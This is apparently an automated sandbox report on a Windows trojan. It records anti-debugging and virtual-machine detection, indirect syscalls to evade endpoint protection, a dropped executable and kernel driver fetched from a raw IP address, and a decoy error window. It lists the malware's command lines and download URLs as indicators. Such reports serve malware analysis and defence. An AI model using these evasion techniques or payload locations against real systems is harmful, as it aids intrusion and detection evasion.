Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	RDTSC instruction interceptor: First address: 7FF7A2B4D305 second address: 7FF7A2B4D335 instructions: 0x00000000 rdtsc 0x00000002 mov bh, 00000043h 0x00000005 inc ecx 0x00000006 pop edx 0x00000007 inc cx 0x00000009 bt ebx, ecx 0x0000000c inc ecx 0x0000000d pop ebx 0x0000000e sal bl, cl 0x00000010 pop ebp 0x00000011 inc ecx 0x00000012 pop edi 0x00000013 inc ecx 0x00000014 pop ecx 0x00000015 dec ecx 0x00000016 and esp, 7E967785h 0x0000001c dec esp 0x0000001d test edx, esp 0x0000001f inc ecx 0x00000020 pop ebp 0x00000021 inc cx 0x00000023 xor eax, 5C410F04h 0x00000029 dec eax 0x0000002a bt eax, 0Fh 0x0000002e cbw 0x00000030 rdtsc
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	RDTSC instruction interceptor: First address: 7FF7A2B613F1 second address: 7FF7A2B613FA instructions: 0x00000000 rdtsc 0x00000002 inc ecx 0x00000003 pop edi 0x00000004 inc ax 0x00000006 movsx edx, bh 0x00000009 rdtsc

Tries to evade analysis by execution special instruction (VM detection)

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Special instruction interceptor: First address: 7FF7A300CFA0 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Special instruction interceptor: First address: 7FF7A300CFB8 instructions rdtsc caused by: RDTSC with Trap Flag (TF)

Source: C:\Windows\Vulnerability.exe

Code function: 5_2_00007FF7738F14C0 GetCurrentProcessId,CreateToolhelp32Snapshot,memset,Process32FirstW,Process32NextW,CloseHandle,

5_2_00007FF7738F14C0

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\driver[1].sys			Jump to dropped file
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Dropped PE file which has not been started: C:\Windows\driver.sys			Jump to dropped file

Source: C:\Windows\Vulnerability.exe

API coverage: 7.5 %

Source: C:\Windows\System32\timeout.exe TID: 2300

Thread sleep count: 38 > 30

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Vulnerability.exe

5_2_00007FF7738F3B60

Source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E7F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@SH
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC0224000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC0224000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E7F4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E867000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWfonsjX

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect debuggers (CloseHandle check)

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe

Handle closed: DEADC0DE

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process queried: DebugObjectHandle			Jump to behavior

Source: C:\Windows\Vulnerability.exe

Code function: 5_2_00007FF7738F4B58 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

5_2_00007FF7738F4B58

Source: C:\Windows\Vulnerability.exe

Code function: 5_2_00007FF7738F14C0 GetCurrentProcessId,CreateToolhelp32Snapshot,memset,Process32FirstW,Process32NextW,CloseHandle,

5_2_00007FF7738F14C0

Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738F1630 SetUnhandledExceptionFilter,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,__std_fs_code_page,memcmp,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	5_2_00007FF7738F1630
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738F4D00 SetUnhandledExceptionFilter,	5_2_00007FF7738F4D00
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738F43B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00007FF7738F43B8
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738F4B58 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00007FF7738F4B58

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe

NtProtectVirtualMemory: Indirect: 0x7FF7A2B8EF62

Jump to behavior

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cd C:\	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Windows\Vulnerability.exe C:\Windows\driver.sys	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5 \| find /i /v "md5" \| find /i /v "certutil"	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Vulnerability.exe C:\Windows\Vulnerability.exe C:\Windows\driver.sys	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i /v "md5"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i /v "certutil"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 5	Jump to behavior

Source: C:\Windows\Vulnerability.exe

Code function: GetLocaleInfoEx,FormatMessageA,

5_2_00007FF7738F38A8

Source: C:\Windows\System32\cmd.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\Vulnerability.exe

Code function: 5_2_00007FF7738F4D6C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

5_2_00007FF7738F4D6C

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Windows Service	1 Exploitation for Privilege Escalation	121 Masquerading	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Credential API Hooking	12 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Windows Service	12 Virtualization/Sandbox Evasion	11 Input Capture	531 Security Software Discovery	Remote Desktop Protocol	11 Input Capture	11 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	11 Process Injection	11 Process Injection	Security Account Manager	12 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	11 Archive Collected Data	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	23 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Obfuscated Files or Information	Cached Domain Credentials	223 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
Iyto7FYCJO.exe	42%	ReversingLabs	Win64.Trojan.Generic
Iyto7FYCJO.exe	100%	Avira	HEUR/AGEN.1315472
Iyto7FYCJO.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Vulnerability[1].exe	100%	Joe Sandbox ML
C:\Windows\Vulnerability.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\driver[1].sys	62%	ReversingLabs	Win64.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Vulnerability[1].exe	55%	ReversingLabs	Win64.Trojan.Dacic
C:\Windows\Vulnerability.exe	55%	ReversingLabs	Win64.Trojan.Dacic
C:\Windows\driver.sys	62%	ReversingLabs	Win64.Trojan.Generic

Source	Detection	Scanner	Label	Link
https://curl.haxx.se/docs/http-cookies.html	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
keyauth.win	172.67.72.57	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.101.104.122/Vulnerability.exe	false		unknown
http://185.101.104.122/driver.sys	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.101.104.122/driver.sysl	Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://keyauth.win/api/1.2/http://185.101.104.122/Vulnerability.exeC:	Iyto7FYCJO.exe, 00000000.00000002.2223519765.00007FF7A27CB000.00000002.00000001.01000000.00000003.sdmp	false		unknown
http://185.101.104.122/Vulnerability.exev	Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC0205000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC020A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.behance.net/madetypeFree	Iyto7FYCJO.exe, 00000000.00000002.2223557132.00007FF7A27F2000.00000004.00000001.01000000.00000003.sdmp	false		unknown
http://185.101.104.122/driver.sysW	Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.101.104.122/driver.sysC:	Iyto7FYCJO.exe, 00000000.00000002.2223519765.00007FF7A27CB000.00000002.00000001.01000000.00000003.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC0224000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.101.104.122/Vulnerability.exeC:	Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC0205000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC020A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://keyauth.win/api/1.2/2(f	Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.101.104.122/driver.syse	Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://curl.haxx.se/docs/http-cookies.html	Iyto7FYCJO.exe, 00000000.00000002.2223519765.00007FF7A27CB000.00000002.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://keyauth.win/api/1.2/	Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.101.104.122/Vulnerability.exeC9?	Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.72.57	keyauth.win	United States		13335	CLOUDFLARENETUS	false
185.101.104.122	unknown	Romania		57673	HOSTCLEAN-SRLRO	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1538236
Start date and time:	2024-10-20 21:14:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Iyto7FYCJO.exe renamed because original name is a hash value
Original Sample Name:	e12627a292cf6a7d32adb932adbd2b3b.exe
Detection:	MAL
Classification:	mal100.expl.evad.winEXE@25/5@1/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 15 Number of non-executed functions: 76
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 204.79.197.219
Excluded domains from analysis (whitelisted): ocsp.digicert.com, a-0016.a-msedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, msdl-microsoft-com.a-0016.a-msedge.net, msdl.microsoft.akadns.net, ctldl.windowsupdate.com, msdl.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Iyto7FYCJO.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
172.67.72.57	SecuriteInfo.com.Trojan.GenericKD.74313215.18321.7540.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Variant.Tedy.640280.26081.14300.exe	Get hash	malicious	Unknown	Browse
	fox vanguard bypass.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win64.DropperX-gen.8867.28776.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.W64.GenKryptik.GHEK.tr.28454.21428.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Trojan.MulDrop28.40.18458.1049.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Trojan.MulDrop28.40.18458.1049.exe	Get hash	malicious	Unknown	Browse
	aj.exe	Get hash	malicious	Unknown	Browse
	Loader (3).exe	Get hash	malicious	Unknown	Browse
	yHMIXSIJiH.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
keyauth.win	G9e272AEyo.exe	Get hash	malicious	Unknown	Browse	104.26.1.5
	oMBUxRQ4cj.exe	Get hash	malicious	Unknown	Browse	104.26.0.5
	SecuriteInfo.com.Trojan.GenericKD.74313215.18321.7540.exe	Get hash	malicious	Unknown	Browse	172.67.72.57
	SecuriteInfo.com.Trojan.GenericKD.74313215.18321.7540.exe	Get hash	malicious	Unknown	Browse	104.26.0.5
	SecuriteInfo.com.Win64.Evo-gen.20301.32747.exe	Get hash	malicious	Unknown	Browse	104.26.0.5
	SecuriteInfo.com.Win64.MalwareX-gen.32411.29244.exe	Get hash	malicious	Unknown	Browse	104.26.0.5
	Frozen_Slotted.exe	Get hash	malicious	Unknown	Browse	104.26.1.5
	SecuriteInfo.com.Variant.Tedy.640280.26081.14300.exe	Get hash	malicious	Unknown	Browse	172.67.72.57
	SecuriteInfo.com.Variant.Tedy.640280.26081.14300.exe	Get hash	malicious	Unknown	Browse	104.26.0.5
	SecuriteInfo.com.Win64.TrojanX-gen.12317.30120.exe	Get hash	malicious	Unknown	Browse	104.26.0.5

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	G9e272AEyo.exe	Get hash	malicious	Unknown	Browse	104.26.1.5
	oMBUxRQ4cj.exe	Get hash	malicious	Unknown	Browse	104.26.0.5
	sims-4-updater-v1.3.4.exe	Get hash	malicious	Unknown	Browse	172.67.75.40
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	104.26.12.205
	9XHFe6y4Dj.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.96.3
	WinFIG.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	WinFIG-2024.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
HOSTCLEAN-SRLRO	SecuriteInfo.com.W64.GenKryptik.GHEK.tr.28454.21428.exe	Get hash	malicious	Unknown	Browse	185.101.104.92

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ce5f3254611a8c095a3d821d44539877	SecuriteInfo.com.Win64.Evo-gen.20301.32747.exe	Get hash	malicious	Unknown	Browse	172.67.72.57
	SecuriteInfo.com.Win64.MalwareX-gen.32411.29244.exe	Get hash	malicious	Unknown	Browse	172.67.72.57
	Frozen_Slotted.exe	Get hash	malicious	Unknown	Browse	172.67.72.57
	SecuriteInfo.com.Win64.TrojanX-gen.12317.30120.exe	Get hash	malicious	Unknown	Browse	172.67.72.57
	fox vanguard bypass.exe	Get hash	malicious	Unknown	Browse	172.67.72.57
	FREE TEST.exe	Get hash	malicious	Unknown	Browse	172.67.72.57
	zara_slotted_cracked.exe	Get hash	malicious	Unknown	Browse	172.67.72.57
	SecuriteInfo.com.Win32.CrypterX-gen.13288.14467.dll	Get hash	malicious	Unknown	Browse	172.67.72.57
	SecuriteInfo.com.Win32.CrypterX-gen.13288.14467.dll	Get hash	malicious	Unknown	Browse	172.67.72.57
	1YJgPEJr4V.exe	Get hash	malicious	Unknown	Browse	172.67.72.57

Process:	C:\Users\user\Desktop\Iyto7FYCJO.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10752
Entropy (8bit):	4.767634671950727
Encrypted:	false
SSDEEP:	96:OnmyUT3zne232FJKQglswx5RFUR0s8j4R4CZzSHWj7gdkX+lqYCg05T1kRRH4:OmyUG2AJKJZx580Fj4y4zYcL+l25e
MD5:	D182377EF3BC7DA3AA3061676A457290
SHA1:	C4B3346CF950F220E1C399A82CDE169F4D14C9FB
SHA-256:	D17E826A7694E368CCDA8BFAB9A3EFAE03CBAAE1D23EE620204EA1840ECC2242
SHA-512:	99A0C746744F370D9B07CED3D6064E69047F4D59F75F31C086D6C28D17A7A726695FF7EFCF4B16255DDBB50D54533BD5C6F4FBED86DDD1240AD780D2D15215E6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 62%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A..U ..U ..U ..U ..T ...X..V ..U ..N ...X..S ...X..P ..:...T ..:...T ..RichU ..................PE..d...4..f.........."....&.......................@....................................t.....`A.................................................`..(............P...............p..$...`2..8........................... 1..@............0...............................text............................... ..h.rdata..P....0......................@..H.data........@....... ..............@....pdata.......P......."..............@..HINIT.........`.......$.............. ..b.reloc..$....p.......(..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Vulnerability[1].exe

Download File

Process:	C:\Users\user\Desktop\Iyto7FYCJO.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	145408
Entropy (8bit):	6.159203978020291
Encrypted:	false
SSDEEP:	3072:nvJpbB++pE3j0XJwH464mIWeBq/y9Dqp2k:xpbBhpE3jQwY6BP/Kkx
MD5:	8619AFEC8BD66B2C589FC987D7D0B194
SHA1:	095C0CC0F2B79CB1D8B8D6CFD453ACA3111C5DC6
SHA-256:	4423F74778917B5BDA37B9DB045291CC980D99376E4818AF113FEE4F8D92EFD3
SHA-512:	424E0067360DFC6845F3D028BCDC80F0AAFA843752C084BBA192BEAD6AD705356F3D78507E5A21F4C67FB61CE6F4834EEF113363B6C62E507CCAC86DBC8C61BB
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}..89..k9..k9..k0..k/..k?..j3..k?..j=..k?..j...k?..j?..kr..j(..k9..k1..kV..j>..kV.ck8..kV..j8..kRich9..k........PE..d...>..f.........."....&.N...........H.........@.............................p............`..........................................................P.......@..0............`..........p.......................(...p...@............`...............................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data........0......................@....pdata..0....@.......$..............@..@.rsrc........P.......4..............@..@.reloc.......`.......6..............@..B................................................................................................................................................................................................................................................................

C:\Windows\Vulnerability.exe

Download File

Process:	C:\Users\user\Desktop\Iyto7FYCJO.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	145408
Entropy (8bit):	6.159203978020291
Encrypted:	false
SSDEEP:	3072:nvJpbB++pE3j0XJwH464mIWeBq/y9Dqp2k:xpbBhpE3jQwY6BP/Kkx
MD5:	8619AFEC8BD66B2C589FC987D7D0B194
SHA1:	095C0CC0F2B79CB1D8B8D6CFD453ACA3111C5DC6
SHA-256:	4423F74778917B5BDA37B9DB045291CC980D99376E4818AF113FEE4F8D92EFD3
SHA-512:	424E0067360DFC6845F3D028BCDC80F0AAFA843752C084BBA192BEAD6AD705356F3D78507E5A21F4C67FB61CE6F4834EEF113363B6C62E507CCAC86DBC8C61BB
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}..89..k9..k9..k0..k/..k?..j3..k?..j=..k?..j...k?..j?..kr..j(..k9..k1..kV..j>..kV.ck8..kV..j8..kRich9..k........PE..d...>..f.........."....&.N...........H.........@.............................p............`..........................................................P.......@..0............`..........p.......................(...p...@............`...............................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data........0......................@....pdata..0....@.......$..............@..@.rsrc........P.......4..............@..@.reloc.......`.......6..............@..B................................................................................................................................................................................................................................................................

C:\Windows\driver.sys

Download File

Process:	C:\Users\user\Desktop\Iyto7FYCJO.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10752
Entropy (8bit):	4.767634671950727
Encrypted:	false
SSDEEP:	96:OnmyUT3zne232FJKQglswx5RFUR0s8j4R4CZzSHWj7gdkX+lqYCg05T1kRRH4:OmyUG2AJKJZx580Fj4y4zYcL+l25e
MD5:	D182377EF3BC7DA3AA3061676A457290
SHA1:	C4B3346CF950F220E1C399A82CDE169F4D14C9FB
SHA-256:	D17E826A7694E368CCDA8BFAB9A3EFAE03CBAAE1D23EE620204EA1840ECC2242
SHA-512:	99A0C746744F370D9B07CED3D6064E69047F4D59F75F31C086D6C28D17A7A726695FF7EFCF4B16255DDBB50D54533BD5C6F4FBED86DDD1240AD780D2D15215E6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 62%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A..U ..U ..U ..U ..T ...X..V ..U ..N ...X..S ...X..P ..:...T ..:...T ..RichU ..................PE..d...4..f.........."....&.......................@....................................t.....`A.................................................`..(............P...............p..$...`2..8........................... 1..@............0...............................text............................... ..h.rdata..P....0......................@..H.data........@....... ..............@....pdata.......P......."..............@..HINIT.........`.......$.............. ..b.reloc..$....p.......(..............@..B................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\Vulnerability.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	24
Entropy (8bit):	4.001629167387823
Encrypted:	false
SSDEEP:	3:34FBOBFRekMov:4Kkov
MD5:	3E3956EF4CCCBF8EB4A1135B76FF06BC
SHA1:	F8A348B224658CCE4BA781480C81F7790F7BB2D3
SHA-256:	A8C95059B77DFC86C559982AECD282C7FA0012EA6E12D3A7D6AEAE89BBC0E3A8
SHA-512:	6D8987E93286B40CDFD2734235FB3978751D67EAC0787242F293964F8194BF35EF16B459751666323CF4ABA0E015AA652A7FEA76D93CDA3980F476CA352F88A3
Malicious:	false
Preview:	[-] Failed to Load PDB..

Static File Info

General

File type:	PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit):	7.915405644351424
